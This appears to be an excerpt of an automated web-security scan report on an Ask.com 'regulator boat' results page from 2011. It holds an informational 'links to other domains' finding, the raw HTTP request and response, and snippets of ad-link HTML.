<a href="http://www.google.com/aclk?sa=L&ai=CGb9nI8tBTaf7CYi7gwei2MTgDs-vrpsB6_PLjBLH8KqbDhACIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_Qyv_DV2La1iVL1tJkcw7qk42HVnw&num=2&sig=AGiWqtxaOv8MgTPeI42JL6EDDeR0g6r_tA&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(97); if (typeof efclk != 'undefined') efclk(97); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_1');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CHdqeI8tBTaf7CYi7gwei2MTgDuHzvLwB6azIxxrnnJnKAxADIPv-gQMoBVDF95fY-v____8BYMmGgICkJMgBAaoEG0_QiobOV2PS1sRJ7TGWGwMEJqLWWyHakk3Y2w&num=3&sig=AGiWqtyvSYuz59s1BpDARImJSZq9LZHA2w&adurl=http://offshoretoys.com/listings.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(5); if (typeof efclk != 'undefined') efclk(5); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_2');" class="nu" onmouseover="return ss('www.offshoretoys.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CHdqeI8tBTaf7CYi7gwei2MTgDuHzvLwB6azIxxrnnJnKAxADIPv-gQMoBVDF95fY-v____8BYMmGgICkJMgBAaoEG0_QiobOV2PS1sRJ7TGWGwMEJqLWWyHakk3Y2w&num=3&sig=AGiWqtyvSYuz59s1BpDARImJSZq9LZHA2w&adurl=http://offshoretoys.com/listings.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(5); if (typeof efclk != 'undefined') efclk(5); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_2');" class="nu" onmouseover="return ss('www.offshoretoys.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CO_zaI8tBTaf7CYi7gwei2MTgDo621OUB7uvvmhLdt9ykCBAEIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Jql0Vdk0tbESe0xlgoCYw_5bIx3Na9eatXRkFRY6tk&num=4&sig=AGiWqtyd8Njj9jxv-KK7-yVxjlEG70MoFg&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(28); if (typeof efclk != 'undefined') efclk(28); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_3');" class="nu" onmouseover="return ss('<b>boat</b>trader.com/<b>North_Carolina</b>')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CO_zaI8tBTaf7CYi7gwei2MTgDo621OUB7uvvmhLdt9ykCBAEIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Jql0Vdk0tbESe0xlgoCYw_5bIx3Na9eatXRkFRY6tk&num=4&sig=AGiWqtyd8Njj9jxv-KK7-yVxjlEG70MoFg&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(28); if (typeof efclk != 'undefined') efclk(28); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_3');" class="nu" onmouseover="return ss('<b>boat</b>trader.com/<b>North_Carolina</b>')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CgE3uI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0OqUxFdl0tfESaUxCHSQvh5S3LSHP0D4jwdkx5g&num=5&sig=AGiWqtwIrsEPmWlvgmP0657sfQALVCPc0g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_4');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CgE3uI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0OqUxFdl0tfESaUxCHSQvh5S3LSHP0D4jwdkx5g&num=5&sig=AGiWqtwIrsEPmWlvgmP0657sfQALVCPc0g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_4');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CB98NI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_Q6pTEV2XS18RJpTEIdJC-HlLctIc_QPiPB2THmA&num=5&ctype=4&sig=AGiWqtwXVSLugSrQroRbsAMRqCnAd48VIQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CB98NI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_Q6pTEV2XS18RJpTEIdJC-HlLctIc_QPiPB2THmA&num=5&ctype=4&sig=AGiWqtwXVSLugSrQroRbsAMRqCnAd48VIQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=ChEMTI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0OqUxFdl0tfESaUxCHSQvh5S3LSHP0D4jwdkx5g&num=5&ctype=4&sig=AGiWqtyWSP4g7rqCa2cV1_wCWjwzDn50eg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=ChEMTI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0OqUxFdl0tfESaUxCHSQvh5S3LSHP0D4jwdkx5g&num=5&ctype=4&sig=AGiWqtyWSP4g7rqCa2cV1_wCWjwzDn50eg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CyWr3I8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0OqUxFdl0tfESaUxCHSQvh5S3LSHP0D4jwdkx5g&num=5&ctype=4&sig=AGiWqtyD1eqspse_Vdu-pqJhO4zK7DCBhA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CyWr3I8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0OqUxFdl0tfESaUxCHSQvh5S3LSHP0D4jwdkx5g&num=5&ctype=4&sig=AGiWqtyD1eqspse_Vdu-pqJhO4zK7DCBhA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CUhAgI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_Q6pTEV2XS18RJpTEIdJC-HlLctIc_QPiPB2THmA&num=5&ctype=4&sig=AGiWqtydSr7q0vmN2txgSr71rjw4F7xT2Q&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3De9952Z-%2525Y1%26sgch%3D897c2BEE2'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CUhAgI8tBTaf7CYi7gwei2MTgDtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_Q6pTEV2XS18RJpTEIdJC-HlLctIc_QPiPB2THmA&num=5&ctype=4&sig=AGiWqtydSr7q0vmN2txgSr71rjw4F7xT2Q&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-621424867?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.32. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=regulator+boat&qsrc=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14A&frstpgo=0&page=2&jss=

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/COb7-uuS26YCFUSo4AodM0xW7Q/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://marinesource.com/builders/regulator/search.html
http://www.askkids.com/?o=0&l=dir
http://www.boatoregon.com/
http://www.boatpartsinfo.com/
http://www.boatquest.com/Regulator/1/allmanufacturerboats.aspx
http://www.boatquest.com/Regulator/26/Morehead-City/1/size_manufacturerCityNameBoats.aspx
http://www.boatsafe.com/
http://www.boattest.com/
http://www.boattrader.com/browse/make/regulator
http://www.classicboat.co.uk/
http://www.google.com/aclk?sa=L&ai=C9W-qHMtBTeb9KsTQggezmNnqDomdlFO5_fqgA8XU-SsQBSD7_oEDKAVQhYnL5gJgyYajh9SjgBCQAQLIAQGqBBlP0KuP0qztwzO7m3uT65RJynKXPPXDNozz&num=5&sig=AGiWqtxBlrPOaZ0ZdaYFlaiT8-erjJT53g&adurl=http://www.sailorman.com/used_gear.php
http://www.google.com/aclk?sa=L&ai=CLllhHMtBTeb9KsTQggezmNnqDovI34UBp6W4nRCGycIyEAMg-_6BAygFUOz8xg9gyYajh9SjgBCQAQLIAQGqBBxP0Ivk3qzrwzPzm5GeD_JOxmxNjPGrafWPNl2C&num=3&sig=AGiWqtxw3bAghgue01eJRlD_tMyP449zfQ&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dregulator%2520marine%26SEM%3Dtrue%26query%3Dregulator%2520marine%26adid%3Dy-20070712-286178-358763_gs%26ref%3Dregulator%2520marine%26creativeid%3D4260100443%26site%3D
http://www.google.com/aclk?sa=l&ai=C5hA0HMtBTeb9KsTQggezmNnqDu2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2-PyrOrDM7ube4LqW2YZEEqA73HZ8edpJP7DdMg&num=2&sig=AGiWqtwTB1uQbvSPSBbr3c9tm7xPiaEyvg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/
http://www.google.com/aclk?sa=l&ai=C98iXHMtBTeb9KsTQggezmNnqDtvO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Q26fPrOnDM_Ob5fx49U7GbE2M8atp9Y82XYI&num=1&sig=AGiWqtzoC2Oq3cqcCZAFybGy-hKU6M1cUw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts
http://www.google.com/aclk?sa=l&ai=CUTtEHMtBTeb9KsTQggezmNnqDpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_Q64TDrOzDM7ube5PrlEnKcpc89cM2jPM&num=4&sig=AGiWqtwbSnNe_PM_tI-BczH7kZ-PFmtCgw&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.oysterharborsregulator.com/

Request

GET /web?q=regulator+boat&qsrc=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14A&frstpgo=0&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:28 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:28 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123401

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/COb7-uuS26YCFUSo4AodM0xW7Q/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C98iXHMtBTeb9KsTQggezmNnqDtvO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Q26fPrOnDM_Ob5fx49U7GbE2M8atp9Y82XYI&num=1&sig=AGiWqtzoC2Oq3cqcCZAFybGy-hKU6M1cUw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(98); if (typeof efclk != 'undefined') efclk(98); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C98iXHMtBTeb9KsTQggezmNnqDtvO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Q26fPrOnDM_Ob5fx49U7GbE2M8atp9Y82XYI&num=1&sig=AGiWqtzoC2Oq3cqcCZAFybGy-hKU6M1cUw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(98); if (typeof efclk != 'undefined') efclk(98); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C5hA0HMtBTeb9KsTQggezmNnqDu2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2-PyrOrDM7ube4LqW2YZEEqA73HZ8edpJP7DdMg&num=2&sig=AGiWqtwTB1uQbvSPSBbr3c9tm7xPiaEyvg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(60); if (typeof efclk != 'undefined') efclk(60); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C5hA0HMtBTeb9KsTQggezmNnqDu2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2-PyrOrDM7ube4LqW2YZEEqA73HZ8edpJP7DdMg&num=2&sig=AGiWqtwTB1uQbvSPSBbr3c9tm7xPiaEyvg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(60); if (typeof efclk != 'undefined') efclk(60); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CLllhHMtBTeb9KsTQggezmNnqDovI34UBp6W4nRCGycIyEAMg-_6BAygFUOz8xg9gyYajh9SjgBCQAQLIAQGqBBxP0Ivk3qzrwzPzm5GeD_JOxmxNjPGrafWPNl2C&num=3&sig=AGiWqtxw3bAghgue01eJRlD_tMyP449zfQ&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dregulator%2520marine%26SEM%3Dtrue%26query%3Dregulator%2520marine%26adid%3Dy-20070712-286178-358763_gs%26ref%3Dregulator%2520marine%26creativeid%3D4260100443%26site%3D" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_2');" class="nu" onmouseover="return ss('<b>regulator</b>.pronto.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CLllhHMtBTeb9KsTQggezmNnqDovI34UBp6W4nRCGycIyEAMg-_6BAygFUOz8xg9gyYajh9SjgBCQAQLIAQGqBBxP0Ivk3qzrwzPzm5GeD_JOxmxNjPGrafWPNl2C&num=3&sig=AGiWqtxw3bAghgue01eJRlD_tMyP449zfQ&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dregulator%2520marine%26SEM%3Dtrue%26query%3Dregulator%2520marine%26adid%3Dy-20070712-286178-358763_gs%26ref%3Dregulator%2520marine%26creativeid%3D4260100443%26site%3D" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_2');" class="nu" onmouseover="return ss('<b>regulator</b>.pronto.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CUTtEHMtBTeb9KsTQggezmNnqDpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_Q64TDrOzDM7ube5PrlEnKcpc89cM2jPM&num=4&sig=AGiWqtwbSnNe_PM_tI-BczH7kZ-PFmtCgw&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(79); if (typeof efclk != 'undefined') efclk(79); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3De3a2Ue-rIg%26sgch%3DcddfYT0vs'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
